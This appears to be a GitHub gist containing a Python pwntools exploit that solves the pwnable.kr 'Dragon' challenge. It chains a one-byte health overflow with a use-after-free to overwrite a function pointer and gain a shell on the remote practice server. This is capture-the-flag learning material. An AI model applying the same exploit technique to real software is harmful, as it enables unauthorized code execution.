Skip to content

Instantly share code, notes, and snippets.

@Pascal-0x90
Created March 9, 2021 23:54
Show Gist options
  • Save Pascal-0x90/67476ce5e7c8ead95d4501ba55749949 to your computer and use it in GitHub Desktop.
Save Pascal-0x90/67476ce5e7c8ead95d4501ba55749949 to your computer and use it in GitHub Desktop.
Pwnable.kr Solve: Dragon
#!/usr/bin/python
###################################
# Std imports
import sys
# Third party Imports
from pwn import *
# Binary
BINARY = sys.argv[1]
# Pwntools Binary info
context(os='linux', arch='i386')
r = ROP(BINARY)
e = ELF(BINARY)
l = e.libc
# Connections and interactions
#p = process(BINARY)
p = remote("pwnable.kr", 9004)
# GDB anyone?
#gdb.attach(p)
#input("Ready to roll?")
###################################
'''
Notes:
- Dragons health is a single byte. Max is 0xff, we could overflow this so we win. (big num becomes smol num)
- This allows us to then overwrite a previous location using a UAF since we use the same buffer which was freed.
- The "name" field becomes the same addr location as the dragon we defeated.
'''
SHELLCODE = b""
JUNK = b""
WIN = 0x08048DBF
'''
steps:
1. kill ourselves.
- This will malloc player, drag, free drag
2. Overflow the dragon, defeat dragon, overwrite former dragon with system addr.
3. Instead of calling PrintPlayerInfo, it will call the system instruction in secretroom.
'''
def die(p):
p.clean()
p.sendline("2")
p.clean()
p.sendline("1")
p.clean()
p.sendline("1")
def overheal(p):
p.clean()
# Select a fighter. I select priest because dragon can heal
p.sendline("1")
# Steps: Let drag heal twice, then you restore mana. 4 times is how many it takes
for i in range(4):
p.sendline("3")
p.sendline("3")
p.sendline("2")
# Overwrite with our desired win condition
p.clean()
p.sendline(p32(WIN))
die(p)
overheal(p)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment